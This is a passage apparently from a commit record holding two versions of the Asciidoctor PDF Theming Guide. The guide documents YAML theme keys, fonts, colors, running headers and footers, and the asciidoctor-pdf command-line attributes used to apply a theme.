333333\n\n|header_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|header_font_size\n|<<values,number>>\n|font_size: 9\n\n|header_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|header_height\n|<<measurement-units,measurement>>\n|height: 0.75in\n\n|header_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [0, 3, 0, 3]\n\n|header_image_valign\n|top, center, bottom, <<measurement-units,measurement>>\n|image_valign: 4\n\n|header_valign\n|top, center, bottom\n|valign: center\n\n|header_<side>_content_<align>*\n|quoted string\nv|`recto_content:\n right: '\\{page-number}'`\n\n|footer_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|footer_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|footer_border_width\n|<<measurement-units,measurement>>\n|border_width: 0.25\n\n|footer_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|footer_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|footer_font_size\n|<<values,number>>\n|font_size: 9\n\n|footer_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|footer_height\n|<<measurement-units,measurement>>\n|height: 0.75in\n\n|footer_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [0, 3, 0, 3]\n\n|footer_image_valign\n|top, center, bottom, <<measurement-units,measurement>>\n|image_valign: 4\n\n|footer_valign\n|top, center, bottom\n|valign: top\n\n|footer_<side>_content_<align>*\n|quoted string\nv|`recto_content:\n center: '\\{page-number}'`\n|===\n\n{asterisk} `<side>` can be `recto` (odd pages) or `verso` (even pages).\n`<align>` can be `left`, `center` or `right`.\n\nIMPORTANT: You must define a height for the running header or footer, respectively, or it will not be shown.\n\nNOTE: The background color spans the width of the page.\nWhen a background color is specified, the border also spans the width of the page.\n\nIn addition to the document-level attributes defined in the AsciiDoc document, the following attributes are available when defining the content keys in the footer:\n\n* page-count\n* page-number\n* document-title\n* document-subtitle\n* chapter-title\n* section-title\n* section-or-chapter-title\n\nFor example:\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n recto_content:\n right: '{section-or-chapter-title} | {page-number}'\n verso_content:\n left: '{page-number} | {chapter-title}'\n----\n\n== Applying your theme\n\nAfter creating a theme, you'll need to tell Asciidoctor PDF where to find it.\nThis is done using AsciiDoc attributes.\n\nThere are three AsciiDoc attributes that tell Asciidoctor PDF how to locate and apply your theme.\n\npdf-stylesdir:: The directory where the theme file is located.\n_Specifying an absolute path is recommended._\n+\nIf you use images in your theme, image paths are resolved relative to this directory.\n\npdf-style:: The name of the YAML theme file to load.\nIf the name ends with `.yml`, it's assumed to be the complete name of a file.\nOtherwise, `-theme.yml` is appended to the name to make the file name (i.e., `<name>-theme.yml`).\n\npdf-fontsdir:: The directory where the fonts used by your theme, if any, are located.\n_Specifying an absolute path is recommended._\n\nLet's assume that you've put your theme files inside a directory named `resources` with the following layout:\n\n....\ndocument.adoc\nresources\/\n themes\/\n basic-theme.yml\n fonts\/\n roboto-normal.ttf\n roboto-italic.ttf\n roboto-bold.ttf\n roboto-bold_italic.ttf\n....\n\nHere's how you'd load your theme when calling Asciidoctor PDF:\n\n $ asciidoctor-pdf -a pdf-stylesdir=resources\/themes -a pdf-style=basic -a pdf-fontsdir=resources\/fonts\n\nIf all goes well, Asciidoctor PDF should run without an error or warning.\n\nNOTE: You only need to specify the `pdf-fontsdir` if you are using custom fonts in your theme.\n\nYou can skip setting the `pdf-stylesdir` attribute and just pass the absolute path of your theme file to the `pdf-style` attribute.\n\n $ asciidoctor-pdf -a pdf-style=resources\/themes\/basic-theme.yml -a pdf-fontsdir=resources\/fonts\n\nHowever, in this case, image paths in your theme won't be resolved properly.\n\nPaths are resolved relative to the current directory.\nHowever, in the future, this may change so that paths are resolved relative to the base directory (typically the document's directory).\nTherefore, it's recommend that you specify absolute paths for now to future-proof your configuration.\n\n $ asciidoctor-pdf -a pdf-stylesdir=\/path\/to\/resources\/themes -a pdf-style=basic -a pdf-fontsdir=\/path\/to\/resources\/fonts\n","old_contents":"= Asciidoctor PDF Theming Guide\nDan Allen <https:\/\/github.com\/mojavelinux>\n:toc: macro\n:icons: font\n:idprefix:\n:idseparator: -\n:window: _blank\n\n\/\/\/\/\nTopics remaining to document:\n* transparent color\n* additional fonts provided by Asciidoctor PDF\n* images\n* title page layout\n* title image\n* title page background image\n* keys\n* how to apply the theme\n\/\/\/\/\n\nThe theming system in Asciidoctor PDF is used to control the layout and styling of the PDF file that Asciidoctor PDF generates from AsciiDoc.\nThe theme is driven by a YAML-based configuration file.\nThis document explains how the theming system works, how to define a custom theme and how to enable the theme when running Asciidoctor PDF.\n\ntoc::[]\n\n== Language overview\n\nThe theme language in Asciidoctor PDF is based on the http:\/\/en.wikipedia.org\/wiki\/YAML[YAML] data format and incorporates many concepts from CSS and SASS.\nTherefore, if you have a background in web design, the theme language should be immediately familiar to you.\n\nLike CSS, themes have both selectors and properties, but only a fraction of what CSS supports.\nUnlike CSS, all selectors are implicit (e.g., `heading`), so you customize the theme primarily by manipulating pre-defined property values (e.g., `font_color`).\n\nA theme (or style) is described in a YAML-based data format and stored in a dedicated theme file.\nYAML is a human-friendly data format that resembles CSS and helps to describe the theme.\nThe theme language adds some extra features to YAML, such as variables, basic math, measurements and color values.\nThese enhancements will be explained in detail in later sections.\n\nThe theme file must be named _<name>-theme.yml_, where `<name>` is the name of the theme.\n\nHere's an example of a basic theme file:\n\n.basic-theme.yml\n[source,yaml]\n----\npage:\n layout: portrait\n margin: [0.75in, 1in, 0.75in, 1in]\n size: Letter\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n line_height_length: 17\n line_height: $base_line_height_length \/ $base_font_size\nvertical_rhythm: $base_line_height_length\nheading:\n font_color: #262626\n font_size: 17\n font_style: bold\n line_height: 1.2\n margin_bottom: $vertical_rhythm\nlink:\n font_color: #002FA7\noutline_list:\n indent: $base_font_size * 1.5\n----\n\nWhen creating a new theme, you only have to define the keys you want to override from the base theme.\nThe converter uses the information from this map to help construct the PDF.\nAll the available keys are documented in <<keys>>.\n\nKeys may be nested to an arbitrary depth to eliminate redundant prefixes (an approach inspired by SASS).\nOnce the theme is loaded, all keys are flattened into a single map of qualified keys.\nNesting is simply a shorthand way of organizing the keys.\nIn the end, a theme is just a map of key\/value pairs.\n\nNested keys are adjoined to their parent key with an underscore (`_`).\nThis means the selector part (e.g., `link`) is combined with the property name (e.g., `font_color`) into a single, qualified key (e.g., `link_font_color`).\n\nFor example, let's assume we want to set the base (i.e., global) font size and color.\nThese keys may be written longhand:\n\n[source,yaml]\n----\nbase_font_color: #333333\nbase_font_family: Times-Roman\nbase_font_size: 12\n----\n\nOr, to avoid having to type the prefix `base_` multiple times, the keys may be written hierarchically:\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n font_family: Times-Roman\n font_size: 12\n----\n\nOr even:\n\n[source,yaml]\n----\nbase:\n font:\n color: #333333\n family: Times-Roman\n size: 12\n----\n\nEach level of nesting must be indented by twice the amount of indentation of the parent level.\nAlso note the placement of the colon after each key name.\n\n== Values\n\nThe value of a key may be one of the following types:\n\n* String\n - Font family name (e.g., Roboto)\n - Font style (normal, bold, italic, bold_italic)\n - Alignment (left, center, right, justify)\n - Color as hex string (e.g., #ffffff)\n - Image path\n* Number (integer or float) with optional units (default unit is points)\n* Array\n - Color as RGB array (e.g., [51, 51, 51])\n - Color CMYK array (e.g., [50, 100, 0, 0])\n - Margin (e.g., [1in, 1in, 1in, 1in])\n - Padding (e.g., [1in, 1in, 1in, 1in])\n* Variable reference (e.g., $base_font_color)\n* Math expression\n\nNote that keys almost always require a value of a specific type, as documented in <<keys>>.\n\n=== Inheritance\n\nLike CSS, inheritance is a key feature in the Asciidoctor PDF theme language.\nFor many of the properties, if a key is not specified, the key inherits the value applied to the parent content in the content hierarchy.\nThis behavior saves you from having to specify properties unless you want to override the inherited value.\n\nThe following keys are inherited:\n\n* font_family\n* font_color\n* font_size\n* font_style\n* line_height (currently some exceptions)\n* text_transform (only for headings)\n* margin_bottom (falls back to $vertical_rhythm)\n\n.Heading Inheritance\n****\nHeadings are special in that they inherit starting from a specific heading level (e.g., `heading_font_size_h2`) to the heading category (e.g., `heading_font_size`) and then directly to the base value (e.g., `base_font_size`), skipping any enclosing context.\n****\n\n=== Variables\n\nTo save you from having to type the same value in your theme over and over, or to allow you to base one value on another, the theme language supports variables.\nVariables consist of the key name preceded by a dollar (`$`) (e.g., `$base_font_size`).\nAny qualified key that has already been defined can be referenced in the value of another key.\n(In order words, as soon as the key is assigned, it's available to be used as a variable).\n\nFor example, once the following line is processed,\n\n[source,yaml]\n----\nbase:\n font_color: #333333\n----\n\nthe variable `$base_font_color` will be available for use in subsequent lines and will resolve to `#333333`.\n\nLet's say you want to make the font color of the sidebar title the same as the heading font color.\nJust assign the value `$heading_font_color` to the `$sidebar_title_font_color`.\n\n[source,yaml]\n----\nheading:\n font_color: #191919\nsidebar:\n title:\n font_color: $heading_font_color\n----\n\nYou can also use variables in math expressions to use one value to build another.\nThis is commonly done to set font sizes proportionally.\nIt also makes it easy to test different values very quickly.\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n font_size_small: $base_font_size * 0.85\n----\n\nWe'll cover more about math expressions in the next section.\n\n=== Math expressions & functions\n\nThe theme language supports basic math operations to support calculated values.\nThe following table lists the supported operations and the corresponding operator for each.\n\n[%header%autowidth]\n|===\n|Operation |Operator\n\n|multiply\n|*\n\n|divide\n|\/\n\n|add\n|+\n\n|subtract\n|-\n|===\n\nNOTE: Like programming languages, multiple and divide take precedence over add and subtract.\n\nThe operator must always be surrounded by a space on either side.\nHere's an example of a math expression with fixed values.\n\n[source,yaml]\n----\nconum:\n line_height: 4 \/ 3\n----\n\nVariables may be used in place of numbers anywhere in the expression:\n\n[source,yaml]\n----\nbase:\n font_size: 12\n font_size_large: $base_font_size * 1.25\n----\n\nValues used in a math expression are automatically coerced to a float value before the operation.\nIf the result of the expression is an integer, the value is coerced to an integer afterwards.\n\nIMPORTANT: Numeric values less than 1 must have a 0 before the decimal point (e.g., 0.85).\n\nThe theme language also supports several functions for rounding the result of a math expression.\nThe following functions may be used if they surround the whole value or expression for a key.\n\nround(...):: Rounds the number to the nearest half integer.\nfloor(...):: Rounds the number up to the next integer.\nceil(...):: Rounds the number down the previous integer.\n\nYou might use these functions in font size calculations so that you get more exact values.\n\n[source,yaml]\n----\nbase:\n font_size: 12.5\n font_size_large: ceil($base_font_size * 1.25)\n----\n\n=== Measurement units\n\nSeveral of the keys require a value in points (pt), the unit of measure for the PDF canvas.\nA point is defined as 1\/72 of an inch.\nHowever, us humans like to think in real world units like inches (in), centimeters (cm) or millimeters (mm).\nYou can let the theme do this conversion for you automatically by adding a unit notation next to any number.\n\nThe following units are supported:\n\n[%header%autowidth]\n|===\n|Unit |Suffix\n\n|Inches\n|in\n\n|Centimeter\n|cm\n\n|Millimeter\n|mm\n\n|Points\n|pt\n|===\n\nHere's an example of how you can use inches to define the page margins:\n\n[source,yaml]\n----\npage:\n margin: [0.75in, 1in, 0.75in, 1in]\n----\n\n=== Colors\n\nThe theme language supports color values in three formats:\n\nHex:: A string of 3 or 6 characters with an optional leading `#`.\nRGB:: An array of numeric values ranging from 0 to 255.\nCMYK:: An array of numeric values ranging from 0 to 1 or from 0% to 100%.\n\n==== Hex\n\nThe hex color value is likely most familiar to web developers.\nThe value must be either 3 or 6 characters (case insensitive) with an optional leading hash (`#`).\n\nThe following are all equivalent values for the color red:\n\n[%autowidth,cols=4]\n|===\n|f00\n|#f00\n|ff0000\n|#ff0000\n|F00\n|#F00\n|FF0000\n|#FF0000\n|===\n\nHere's how a hex color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: #ff0000\n----\n\n==== RGB\n\nAn RGB array value must be three numbers ranging from 0 to 255.\nThe values must be separated by commas and be surrounded by square brackets.\n\nNOTE: An RGB array is automatically converted to a hex string internally, so there's no difference between ff0000 and [255, 0, 0].\n\nHere's how to specify the color red in RGB:\n\n* [255, 0, 0]\n\nHere's how a RGB color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [255, 0, 0]\n----\n\n==== CMYK\n\nA CMYK array value must be four numbers ranging from 0 and 1 or from 0% to 100%.\nThe values must be separated by commas and be surrounded by square brackets.\n\nUnlike the RGB array, the CMYK array _is not_ converted to a hex string internally.\nPDF has native support for CMYK colors, so you can preserve the original color values in the final PDF.\n\nHere's how to specify the color red in CMYK:\n\n* [0, 0.99, 1, 0]\n* [0, 99%, 100%, 0]\n\nHere's how a CMYK color value appears in the theme file:\n\n[source,yaml]\n----\nbase:\n font_color: [0, 0.99, 1, 0]\n----\n\n=== Images\n\nPENDING\n\n== Fonts\n\nYou can select from built-in PDF fonts or custom fonts loaded from TrueType font (TTF) files.\nIf you want to use custom fonts, you must first declare them in your theme file.\n\n=== Built-in fonts\n\nThe names of the built-in fonts (for general-purpose text) are as follows:\n\n[%header%autowidth]\n|===\n|Font Name |Font Family\n\n|Helvetica\n|sans-serif\n\n|Times-Roman\n|serif\n\n|Courier\n|monospace\n|===\n\nUsing a built-in font requires no additional files.\nYou can use the key anywhere a `font_family` property is accepted in the theme file.\nFor example:\n\n[source,yaml]\n----\nbase:\n font_family: Times-Roman\n----\n\nHowever, when you use a built-in font, the characters that you use in your document are limited to the WINANSI (http:\/\/en.wikipedia.org\/wiki\/Windows-1252[Windows-1252]) code set.\nWINANSI includes most of the characters needed for writing in Western languages (English, French, Spanish, etc).\nFor anything outside of that, PDF is BYOF (Bring Your Own Font).\n\nEven though the built-in fonts require the content to be encoded in WINANSI, _you still type your AsciiDoc document in UTF-8_.\nAsciidoctor PDF encodes the content into WINANSI when building the PDF.\nAny characters in your AsciiDoc document that cannot be encoded will be replaced with an underscore (`_`).\n\n=== Custom fonts\n\nThe limited character set of WINANSI, or the bland look of the built-in fonts, may motivate you to load your own font.\nCustom fonts can enhance the look of your PDF theme substantially.\n\nTo start, you need to find a collection of TTF file of the font you want to use.\nA collection typically consists of all four styles of a font:\n\n* normal\n* italic\n* bold\n* bold_italic\n\nYou'll need all four styles to support AsciiDoc content properly.\n_Asciidoctor PDF cannot italicize a font that is not italic like a browser can._\n\nOnce you've obtained the TTF files, put them into a directory in your project where you want to store the fonts.\nIt's recommended that you name them consistently so it's easier to type the names in the theme file.\n\nLet's assume the name of the font is https:\/\/github.com\/google\/roboto\/tree\/master\/out\/RobotoTTF[Roboto].\nName the files as follows:\n\n* roboto-normal.ttf (_originally Roboto-Regular.ttf_)\n* roboto-italic.ttf (_originally Roboto-Italic.ttf_)\n* roboto-bold.ttf (_originally Roboto-Bold.ttf_)\n* roboto-bold_italic.ttf (_originally Roboto-BoldItalic.ttf_)\n\nNext, declare the font under the `font_catalog` key at the top of your theme file, giving it a unique key (e.g., `Roboto`).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n----\n\nYou can use the key you gave to the font in the font catalog anywhere a `font_family` property is accepted in the theme file.\nFor instance, to use the Roboto font for all headings, you'd use:\n\n[source,yaml]\n----\nheading:\n font_family: Roboto\n----\n\nWhen you execute Asciidoctor PDF, you need to specify the directory where the fonts reside using the `pdf-fontsdir` attribute:\n\n $ asciidoctor-pdf -a pdf-style=basic-theme.yml -a pdf-fontsdir=path\/to\/fonts document.adoc\n\nWARNING: Currently, all fonts referenced by the theme need to be present in the directory specified by the `pdf-fontsdir` attribute.\n\nYou can add any number of fonts to the catalog.\nEach font must be assigned a unique key, as shown here:\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n RobotoLight:\n normal: roboto-light-normal.ttf\n italic: roboto-light-italic.ttf\n bold: roboto-light-bold.ttf\n bold_italic: roboto-light-bold_italic.ttf\n----\n\n=== Fallback fonts\n\nIf one of your fonts is missing a character that is used in a document, such as special symbols, you can tell Asciidoctor PDF to retrieve the character from a fallback font.\nYou only need to specify one fallback font...typically one that has a full set of symbols.\n\nLike with other custom fonts, you first need to declare the fallback font.\nLet's choose https:\/\/android.googlesource.com\/platform\/frameworks\/base\/+\/master\/data\/fonts\/[Droid Sans Fallback].\nYou can map all the styles to a single font file (since bold and italic don't usually make sense for symbols).\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n----\n\nNext, assign the key to the `fallbacks` key under the `font_catalog` key.\nBe sure to surround the key name in square brackets as shown below.\n\n[source,yaml]\n----\nfont:\n catalog:\n Roboto:\n normal: roboto-normal.ttf\n italic: roboto-italic.ttf\n bold: roboto-bold.ttf\n bold_italic: roboto-bold_italic.ttf\n DroidSansFallback:\n normal: droid-sans-fallback.ttf\n italic: droid-sans-fallback.ttf\n bold: droid-sans-fallback.ttf\n bold_italic: droid-sans-fallback.ttf\n fallbacks: [DroidSansFallback]\n----\n\nTIP: If you are using more than one fallback font, separate each key name by a comma.\n\nThat's it!\nNow you're covered.\nYou don't need to reference the fallback font anywhere else in your theme file to use it.\n\nCAUTION: Using a fallback font does slow down PDF generation slightly.\nIt's best to select fonts that have all the characters you need.\n\n== Keys\n\nTBW\n\n=== Page\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|page_background_color\n|<<colors,color>>\n|background_color: ffffff\n\n|page_layout\n|portrait, landscape\n|layout: portrait\n\n|page_margin\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|margin: [0.5in, 0.67in, 0.67in, 0.67in]\n\n|page_size\n|named size, <<measurement-units,measurement array [2]>>\n|size: Letter\n|===\n\n=== Base\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|base_font_color\n|<<colors,color>>\n|font_color: #333333\n\n|base_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|base_font_size\n|<<values,number>>\n|font_size: 10.5\n\n|base_line_height_length\n|<<values,number>>\n|line_height_length: 12\n\n|base_line_height\n|<<values,number>>\n|line_height: 1.14\n\n|base_font_size_large\n|<<values,number>>\n|font_size_large: 13\n\n|base_font_size_small\n|<<values,number>>\n|font_size_small: 9\n\n|base_font_style\n|normal, italic, bold, bold_italic\n|font_style: normal\n\n|base_align\n|left, center, right, justify\n|align: justify\n\n|base_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|base_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|base_border_color\n|<<colors,color>>\n|border_color: eee\n|===\n\n=== Vertical and horizontal rhythm\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|vertical_rhythm\n|<<values,number>>\n|vertical_rhythm: 12\n\n|horizontal_rhythm\n|<<values,number>>\n|horizontal_rhythm: 12\n|===\n\n=== Link\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|link_font_color\n|<<colors,color>>\n|font_color: 428BCA\n\n|link_font_family\n|<<fonts,font family name>>\n|font_family: Roboto\n\n|link_font_size\n|<<values,number>>\n|font_size: 9\n\n|link_font_style\n|normal, italic, bold, bold_italic\n|font_style: normal\n|===\n\n=== Literal inline\n\nThe literal key is used for inline monospaced text in prose and table cells.\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|literal_font_color\n|<<colors,color>>\n|font_color: B12146\n\n|literal_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|literal_font_size\n|<<values,number>>\n|font_size: 12\n\n|literal_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n|===\n\n=== Heading\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|heading_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|heading_h<n>_font_color\n|<<colors,color>>\n|h2_font_color: [0, 99%, 100%, 0]\n\n|heading_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|heading_h<n>_font_family\n|<<fonts,font family name>>\n|h4_font_family: Roboto\n\n|heading_font_size\n|<<values,number>>\n|font_size: 9\n\n|heading_h<n>_font_size\n|<<values,number>>\n|h6_font_size: round($base_font_size * 1.7)\n\n|heading_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|heading_h<n>_font_style\n|normal, italic, bold, bold_italic\n|h3_font_style: bold_italic\n\n|heading_line_height\n|<<values,number>>\n|line_height: 1.2\n\n|heading_margin_top\n|<<measurement-units,measurement>>\n|margin_top: $vertical_rhythm * 0.2\n\n|heading_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 9.600\n|===\n\n=== Title page\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|title_page_align\n|left, center, right, justify\n|align: right\n\n|title_page_title_top\n|percentage\n|title_top: 55%\n\n|title_page_title_font_size\n|<<values,number>>\n|title_font_size: 27\n\n|title_page_title_font_color\n|<<colors,color>>\n|title_font_color: 999999\n\n|title_page_title_line_height\n|<<values,number>>\n|title_line_height: 0.9\n\n|title_page_subtitle_font_size\n|<<values,number>>\n|subtitle_font_size: 18\n\n|title_page_subtitle_font_style\n|normal, italic, bold, bold_italic\n|subtitle_font_style: bold_italic\n\n|title_page_subtitle_line_height\n|<<values,number>>\n|subtitle_line_height: 1\n\n|title_page_authors_margin_top\n|<<measurement-units,measurement>>\n|authors_margin_top: 13.125\n\n|title_page_authors_font_size\n|<<values,number>>\n|authors_font_size: $base_font_size_large\n\n|title_page_authors_font_color\n|<<colors,color>>\n|authors_font_color: 181818\n\n|title_page_revision_margin_top\n|<<measurement-units,measurement>>\n|revision_margin_top: 13.125\n|===\n\n=== Block\n\n\/\/ Blocks include admonition, example, quote, verse, sidebar, image, listing, literal, and table.\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|block_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [12, 15, 12, 15]\n\n|block_margin_top\n|<<measurement-units,measurement>>\n|margin_top: 0\n\n|block_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 1\n|===\n\n=== Caption\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|caption_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|caption_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|caption_font_size\n|<<values,number>>\n|font_size: 11\n\n|caption_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|caption_align\n|left, center, right, justify\n|align: left\n\n|caption_margin_inside\n|<<measurement-units,measurement>>\n|margin_inside: 3\n\n|caption_margin_outside\n|<<measurement-units,measurement>>\n|margin_outside: 0\n|===\n\n=== Code\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|code_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|code_font_family\n|<<fonts,font family name>>\n|font_family: Mplus1mn\n\n|code_font_size\n|<<values,number>>\n|font_size: 11\n\n|code_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|code_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: 11\n\n|code_line_height\n|<<values,number>>\n|line_height: 1.25\n\n|code_background_color\n|<<colors,color>>\n|background_color: F5F5F5\n\n|code_border_color\n|<<colors,color>>\n|border_color: CCCCCC\n\n|code_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|code_border_width\n|<<values,number>>\n|border_width: 0.75\n|===\n\n=== Blockquote\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|blockquote_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|blockquote_font_family\n|<<fonts,font family name>>\n|font_family: Notoserif\n\n|blockquote_font_size\n|<<values,number>>\n|font_size: 13\n\n|blockquote_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|blockquote_border_width\n|<<values,number>>\n|border_width: 5\n\n|blockquote_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|blockquote_cite_font_size\n|<<values,number>>\n|cite_font_size: 9\n\n|blockquote_cite_font_color\n|<<colors,color>>\n|cite_font_color: 999999\n\n|blockquote_cite_font_family\n|<<fonts,font family name>>\n|cite_font_family: Notoserif\n\n|blockquote_cite_font_style\n|normal, italic, bold, bold_italic\n|cite_font_style: bold\n\n|===\n\n=== Sidebar\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|sidebar_border_color\n|<<colors,color>>\n|border_color: FFFFFF\n\n|sidebar_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|sidebar_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|sidebar_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|sidebar_title_font_color\n|<<colors,color>>\n|title_font_color: 333333\n\n|sidebar_title_font_family\n|<<fonts,font family name>>\n|title_font_family: NotoSerif\n\n|sidebar_title_font_size\n|<<values,number>>\n|title_font_size: 13\n\n|sidebar_title_font_style\n|normal, italic, bold, bold_italic\n|title_font_style: bold\n\n|sidebar_title_align\n|left, center, right, justify\n|title_align: center\n|===\n\n=== Example\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|example_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|example_border_radius\n|<<values,number>>\n|border_radius: 4\n\n|example_border_width\n|<<values,number>>\n|border_width: 0.75\n\n|example_background_color\n|<<colors,color>>\n|background_color: transparent\n|===\n\n=== Admonition\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|admonition_border_color\n|<<colors,color>>\n|border_color: EEEEEE\n\n|admonition_border_width\n|<<values,number>>\n|border_width: 0.5\n|===\n\n=== Image\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|image_align_default\n|left, center, right, justify\n|align_default: left\n|===\n\n=== Lead\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|lead_font_size\n|<<values,number>>\n|font_size: 13\n\n|lead_line_height\n|<<values,number>>\n|line_height: 1.4\n|===\n\n=== Abstract\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|abstract_font_color\n|<<colors,color>>\n|font_color: 5C6266\n\n|abstract_font_size\n|<<values,number>>\n|font_size: 13\n\n|abstract_line_height\n|<<values,number>>\n|line_height: 1.4\n\n|abstract_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n|===\n\n=== Thematic break\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|thematic_break_border_color\n|<<colors,color>>\n|border_colorL EEEEEE\n\n|thematic_break_margin_top\n|<<measurement-units,measurement>>\n|margin_top: 6\n\n|thematic_break_margin_bottom\n|<<measurement-units,measurement>>\n|margin_bottom: 18\n|===\n\n=== Description list\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|description_list_term_font_style\n|normal, italic, bold, bold_italic\n|term_font_style: italic\n\n|description_list_description_indent\n|<<values,number>>\n|description_indent: 15\n|===\n\n\n=== Outline list\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|outline_list_indent\n|<<measurement-units,measurement>>\n|list_indent: 40\n\n|outline_list_item_spacing\n|<<measurement-units,measurement>>\n|item_spacing: 4\n|===\n\n=== Table\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|table_background_color\n|<<colors,color>>\n|background_color: FFFFFF\n\n|table_even_row_background_color\n|<<colors,color>>\n|even_row_background_color: F9F9F9\n\n|table_foot_background_color\n|<<colors,color>>\n|foot_background_color: F0F0F0\n\n|table_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|table_border_width\n|<<values,number>>\n|border_width: 0.5\n\n|table_cell_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|cell_padding: [3, 3, 6, 3]\n|===\n\n[[key-toc]]\n=== Table of contents\n\n[cols=\"1d,1d,2m\"]\n|===\n|Key |Value Type |Example\n\n|toc_dot_leader_content\n|double-quoted string\n|dot_leader_content: \". \"\n\n|toc_dot_leader_color\n|<<colors,color>>\n|dot_leader_color: 999999\n\n|toc_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|toc_h<n>_font_color\n|<<colors,color>>\n|h3_font_color: 999999\n\n|toc_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|toc_font_size\n|<<values,number>>\n|font_size: 9\n\n|toc_font_style\n|normal, italic, bold, bold_italic\n|font_style: bold\n\n|toc_line_height\n|number\n|line_height: 1.5\n\n|toc_indent\n|<<measurement-units,measurement>>\n|indent: 20\n\n|toc_margin_top\n|<<measurement-units,measurement>>\n|indent: 20\n|===\n\n=== Running header & footer\n\n[cols=\"3,5,5m\"]\n|===\n|Key |Value Type |Example\n\n|header_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|header_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|header_border_width\n|<<measurement-units,measurement>>\n|border_width: 0.25\n\n|header_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|header_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|header_font_size\n|<<values,number>>\n|font_size: 9\n\n|header_font_style\n|normal, italic, bold, 